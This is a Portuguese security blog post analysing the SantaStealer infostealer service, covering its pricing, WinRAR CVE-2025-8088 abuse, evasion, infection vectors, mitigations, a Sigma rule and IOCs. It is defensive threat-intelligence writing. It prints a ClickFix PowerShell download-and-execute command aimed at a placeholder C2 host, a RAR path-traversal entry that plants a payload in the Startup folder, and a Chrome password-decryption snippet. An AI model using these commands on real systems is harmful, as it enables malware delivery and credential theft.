A temporada natalícia de 2025 trouxe um “presente” indesejado para o mundo da cibersegurança: o SantaStealer, um novo infostealer-as-a-service que está a revolucionar o mercado de malware. Neste artigo do Blog Dolutech, vamos analisar profundamente esta ameaça emergente que já está a ser promovida agressivamente em canais underground e representa um risco significativo para organizações e utilizadores individuais.
O Que é o SantaStealer?
O SantaStealer é um infostealer sofisticado oferecido como Malware-as-a-Service (MaaS), anteriormente conhecido como BluelineStealer antes de passar por um rebranding estratégico. Descoberto pelos investigadores da Rapid7 Labs no início de dezembro de 2025, este malware foi oficialmente lançado a 16 de dezembro de 2025, tornando-se imediatamente operacional no ecossistema do cibercrime.
A Dolutech identificou que este stealer representa uma evolução preocupante no mercado de malware, combinando acessibilidade económica com capacidades técnicas avançadas. Desenvolvido completamente em linguagem C, o SantaStealer promete aos seus operadores a capacidade de extrair dados sensíveis em apenas 20 segundos após a infecção.
Características Técnicas Principais
O malware foi arquitetado com 14 módulos personalizados de recolha de dados, cada um executando em thread separada para maximizar a eficiência. A infraestrutura técnica inclui:
Bibliotecas Estáticas Integradas:
- cJSON para processamento de dados JSON
- miniz como biblioteca de compressão alternativa ao zlib
- sqlite3 para interface com bases de dados SQLite
Capacidades de Extração:
- Credenciais guardadas em 23 browsers diferentes (Chrome, Firefox, Edge, Opera, Brave, entre outros)
- Cookies e tokens de sessão ativos
- Dados de 15 carteiras de criptomoeda diferentes
- Conteúdo do clipboard em tempo real
- Dados de aplicações populares (Discord, Steam, Telegram)
- Documentos sensíveis do sistema de ficheiros
- Dados de formulários de preenchimento automático
- Histórico de navegação e bookmarks
Modelo de Negócio e Distribuição
O SantaStealer está a ser comercializado através de canais Telegram e fóruns underground russos, nomeadamente no fórum Lolz. O modelo de subscrição apresenta duas variantes:
Plano Basic: $175 USD mensais
- Acesso ao painel de controlo web
- 14 módulos de recolha de dados
- Suporte técnico básico
- Atualizações regulares
Plano Premium: $300 USD mensais
- Todas as funcionalidades do plano Basic
- Opções de configuração avançadas
- Binding de ficheiros personalizados
- Suporte prioritário
- Builder de exportação WinRAR
Nós, no Blog Dolutech, alertamos que este modelo de pricing acessível democratiza o acesso a capacidades avançadas de roubo de informação, permitindo que cibercriminosos com conhecimentos técnicos limitados lancem campanhas sofisticadas.
Exploração do CVE-2025-8088: A Vulnerabilidade WinRAR
Uma característica particularmente preocupante é a inclusão de um builder de exportação WinRAR que explora a vulnerabilidade CVE-2025-8088 (CVSS 8.4). Esta falha de path traversal no WinRAR permite que atacantes:
- Incorporem payloads maliciosos em Alternate Data Streams (ADS)
- Manipulem caminhos de extração usando sequências de traversal (..)
- Depositem ficheiros em diretórios sensíveis (pasta Startup do Windows)
- Estabeleçam persistência automática no sistema
Exemplo Técnico de Exploração:
# Estrutura do arquivo RAR malicioso
documento.pdf
documento.pdf:..\..\..\..\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe
# Após extração, o payload é colocado na pasta Startup
# Execução automática no próximo login
A vulnerabilidade afeta todas as versões do WinRAR até 7.12, tendo sido corrigida na versão 7.13 lançada a 30 de julho de 2025. O grupo APT russo RomCom já explorou ativamente esta falha desde 18 de julho de 2025.
Técnicas de Evasão e Anti-Análise
Apesar das promessas publicitárias de ser “totalmente indetectável”, a análise da Rapid7 revelou que as amostras iniciais do SantaStealer apresentam fraquezas significativas de segurança operacional:
Falhas Identificadas:
- Mais de 500 símbolos exportados com nomes descritivos (payload_main, check_antivm, browser_names)
- Strings não encriptadas no código
- Ficheiros DLL não ofuscados
- Dados exfiltrados enviados via HTTP não encriptado (porta 6767)
No entanto, o malware implementa várias técnicas anti-análise:
Verificações Anti-VM:
- Deteção de layouts de teclado russo (evita sistemas CIS)
- Verificação de processos bloqueados via checksums personalizados
- Deteção de nomes de computadores suspeitos
- Verificação de uptime do sistema
- Deteção baseada em tempo para debuggers
Bypass de AppBound Encryption:
O SantaStealer incorpora um executável adicional baseado no projeto ChromElevator que utiliza:
- Reflective process hollowing baseado em syscalls diretos
- Injeção em processos legítimos do browser
- Decriptação de chaves AppBound Encryption usando ChaCha20
- Acesso a credenciais protegidas sem alertas imediatos
# Exemplo conceitual de bypass DPAPI
import win32crypt
def decrypt_chrome_password(encrypted_password):
# SantaStealer usa DPAPI para descriptografar
decrypted = win32crypt.CryptUnprotectData(encrypted_password)
return decrypted
Vetores de Infecção Primários
A Dolutech identificou os seguintes vetores de distribuição mais prováveis para o SantaStealer:
1. Ataques ClickFix
Técnica emergente onde utilizadores são induzidos a executar comandos PowerShell maliciosos:
# Exemplo de comando ClickFix usado em campanhas
powershell -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious-c2[.]com/loader.ps1')"
2. Software Pirata e Cracks
Distribuição através de:
- Torrents de software crackeado
- Keygens falsos
- Cheats para videojogos
- Plugins e extensões não verificados
3. Phishing e Malspam
Campanhas de email com:
- Anexos RAR maliciosos explorando CVE-2025-8088
- Lures temáticos (currículos, faturas, documentos financeiros)
- URLs para sites de download falsos
4. Malvertising e SEO Poisoning
- Anúncios maliciosos em motores de busca
- Sites falsos posicionados no topo dos resultados
- Imitação de páginas de download legítimas
Processo de Exfiltração de Dados
O SantaStealer segue um fluxo operacional meticulosamente projetado:
- Execução: Verificação anti-VM e anti-análise
- Coleta: 14 módulos executam simultaneamente em threads separadas
- Processamento: Dados escritos em memória (operação fileless)
- Compressão: Arquivo ZIP criado em memória
- Chunking: Divisão em blocos de 10MB
- Exfiltração: Envio para C2 via HTTP não encriptado (porta 6767)
- Entrega: Logs disponibilizados via Telegram e painel web
Impacto e Ameaças Derivadas
Nós alertamos para as consequências em cascata de uma infecção por SantaStealer:
Ameaças Imediatas:
- Account takeover em massa de contas corporativas e pessoais
- Roubo de fundos de carteiras de criptomoeda
- Acesso não autorizado a email corporativo e SaaS
- Comprometimento de contas de redes sociais
Ameaças Secundárias:
- Venda de “logs” em mercados clandestinos (Russian Market, Genesis Market)
- Utilização de credenciais para ataques de ransomware
- Movimentação lateral em redes corporativas
- Espionagem industrial e roubo de propriedade intelectual
Impacto no Compliance:
- Violações de RGPD com multas até 4% do faturamento global
- Não conformidade com NIS2 e DORA
- Obrigações de notificação ao CNCS e CERT.PT
Estratégias de Mitigação Abrangentes
A Dolutech recomenda uma abordagem em múltiplas camadas para defesa contra o SantaStealer:
Controles Técnicos Essenciais
1. Atualização Urgente do WinRAR
# Verificar versão instalada do WinRAR
# Versões vulneráveis: ≤ 7.12
# Versão segura: ≥ 7.13
# Atualizar para WinRAR 7.13 ou superior imediatamente
2. Configuração de EDR/Antivírus Avançado
Implemente soluções com:
- Deteção comportamental (não apenas baseada em assinaturas)
- Monitorização de WinAPI abuse (T1555.003)
- Análise de tráfego HTTP POST anómalo
- Deteção de process hollowing e injeção
- Hunting para chamadas DPAPI suspeitas
Exemplo de Regra de Deteção Sigma:
title: SantaStealer Data Exfiltration Detection
status: experimental
description: Deteta padrões de exfiltração típicos do SantaStealer
logsource:
category: network_connection
product: windows
detection:
selection:
DestinationPort: 6767
Protocol: TCP
ImageLoaded|contains:
- 'chrome.exe'
- 'firefox.exe'
- 'msedge.exe'
condition: selection
falsepositives:
- Conexões legítimas à porta 6767 (baixa probabilidade)
level: high
Hardening de Browsers
// Configurações Chrome via Group Policy
// Desabilitar armazenamento de senhas no browser
{
"PasswordManagerEnabled": false,
"CredentialsEnableService": false,
"SyncDisabled": true
}
Application Allowlisting
# Implementar AppLocker para bloquear executáveis em pastas graváveis
New-AppLockerPolicy -RuleType Path -Path "C:\Users\*\AppData\*" -RuleNamePrefix "Block-AppData" -Deny
Controles Administrativos
1. Autenticação Multi-Fator Resistente a Phishing
Implementar:
- FIDO2 / WebAuthn
- Chaves de segurança físicas (YubiKey, Titan)
- Passkeys quando disponível
- EVITAR: MFA baseado apenas em SMS ou TOTP (vulnerável a session hijacking)
2. Política de Gestão de Credenciais
- Utilizar gestores de passwords corporativos (1Password, Bitwarden Enterprise)
- Proibir armazenamento de credenciais em browsers
- Implementar rotação automática de senhas a cada 90 dias
- Exigir senhas únicas para cada serviço (min. 16 caracteres)
3. Segmentação de Rede
- Implementar arquitetura Zero Trust
- Microsegmentação de redes críticas
- Monitorização de tráfego East-West
- Isolamento de estações de trabalho comprometidas
4. Monitorização Proativa
# Verificar por indicadores de compromisso
# Monitorizar conexões à porta 6767
netstat -ano | findstr ":6767"
# Verificar processos suspeitos
Get-Process | Where-Object {$_.Path -like "*AppData\Local\Temp*"}
# Analisar tarefas agendadas recentes
Get-ScheduledTask | Where-Object {$_.Date -gt (Get-Date).AddDays(-7)}
Controles de Consciencialização
Programa de Formação Obrigatório:
- Reconhecimento de Phishing Avançado
- Identificação de lures temáticos (CVs, faturas)
- Verificação de domínios suspeitos
- Análise de anexos RAR/ZIP antes de abrir
- Higiene de Software
- Nunca descarregar software de fontes não oficiais
- Evitar cracks, keygens e software pirata
- Verificar assinaturas digitais de ficheiros
- Utilizar apenas repositórios oficiais (Microsoft Store, site oficial)
- Gestão de Credenciais
- Não reutilizar senhas entre serviços pessoais e corporativos
- Não armazenar credenciais em browsers
- Utilizar apenas gestores de senhas aprovados
- Ativar MFA em todos os serviços disponíveis
Indicadores de Compromisso (IOCs)
A Dolutech compilou os seguintes indicadores técnicos para deteção:
Hashes SHA-256 de Amostras:
1a27... (DLL variant)
926a... (EXE variant)
Padrões de Rede:
# Conexões C2
- Porta: 6767/TCP
- Protocolo: HTTP não encriptado
- User-Agent: Customizado (varia por build)
- Chunk size: 10MB
Artefactos de Sistema:
# Localizações comuns
C:\Users\[USER]\AppData\Local\Temp\*
C:\Users\[USER]\AppData\Roaming\*
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
%TEMP%\*.zip
Processos Suspeitos:
- node.exe com argumentos incomuns
- chrome.exe com processos filhos anómalos
- powershell.exe com flags -NoProfile -ExecutionPolicy Bypass
- wscript.exe / cscript.exe em diretórios de utilizador
Contexto do Mercado MaaS em 2025
O SantaStealer surge num contexto preocupante do ecossistema de infostealers. Dados da KELA e SpyCloud revelam:
- 3.9 mil milhões de credenciais comprometidas em 2025
- 4.3 milhões de dispositivos infetados documentados
- 66% dos dispositivos infetados tinham EDR instalado
- 58% de aumento em ataques de infostealers comparado com 2024
- 70% dos dispositivos infetados são pessoais (BYOD risk)
Competidores no mercado MaaS incluem:
- Lumma Stealer: Recentemente desmantelado por autoridades
- StealC V2: $200/mês, 66% bypass rate de EDR
- Acreed: Nova variante com ML para priorização de alvos
- Nexus Stealer: Especializado em password managers
Conformidade Regulatória Europeia
As organizações sujeitas a regulamentação europeia devem considerar:
NIS2 (Diretiva UE 2022/2555):
- Obrigação de implementar medidas técnicas adequadas
- Notificação de incidentes em 24 horas ao CSIRT nacional
- Penalizações até €10 milhões ou 2% do faturamento global
DORA (Regulamento UE 2022/2554):
- Entidades financeiras devem garantir resiliência operacional digital
- Testes de penetração obrigatórios incluindo cenários de infostealer
- Framework de gestão de riscos de terceiros
RGPD (Regulamento UE 2016/679):
- Credenciais roubadas constituem violação de dados pessoais
- Notificação à autoridade supervisora em 72 horas
- Comunicação aos titulares dos dados se alto risco
Conclusão
O SantaStealer representa uma ameaça significativa e crescente no panorama de cibersegurança de 2025. A sua disponibilização como serviço a preços acessíveis, combinada com capacidades técnicas avançadas e exploração de vulnerabilidades zero-day recentes (CVE-2025-8088), torna este infostealer particularmente perigoso.
Nós, na Dolutech, enfatizamos que a defesa eficaz contra esta ameaça requer uma abordagem holística que combine:
- Controlos técnicos robustos (EDR, segmentação, monitorização)
- Práticas administrativas rigorosas (MFA resistente, gestão de credenciais)
- Formação contínua de utilizadores
- Conformidade com frameworks regulatórios europeus
As organizações não podem confiar apenas em soluções perimetrais ou antivírus tradicionais. A taxa de bypass de 66% em soluções EDR demonstra que é imperativo adotar uma postura de segurança centrada na identidade, assumindo que a comprometimento eventual é inevitável e preparando-se adequadamente para deteção e resposta rápidas.
O mercado de infostealers continuará a evoluir rapidamente. Permanecer informado sobre ameaças emergentes como o SantaStealer e adaptar continuamente as defesas é essencial para proteger ativos críticos e dados sensíveis no ambiente digital de 2025.

Amante por tecnologia Especialista em Cibersegurança e Big Data, Formado em Administração de Infraestrutura de Redes, Pós-Graduado em Ciências de Dados e Big Data Analytics e Machine Learning, Com MBA em Segurança da Informação, Escritor do livro ” Cibersegurança: Protegendo a sua Reputação Digital”.


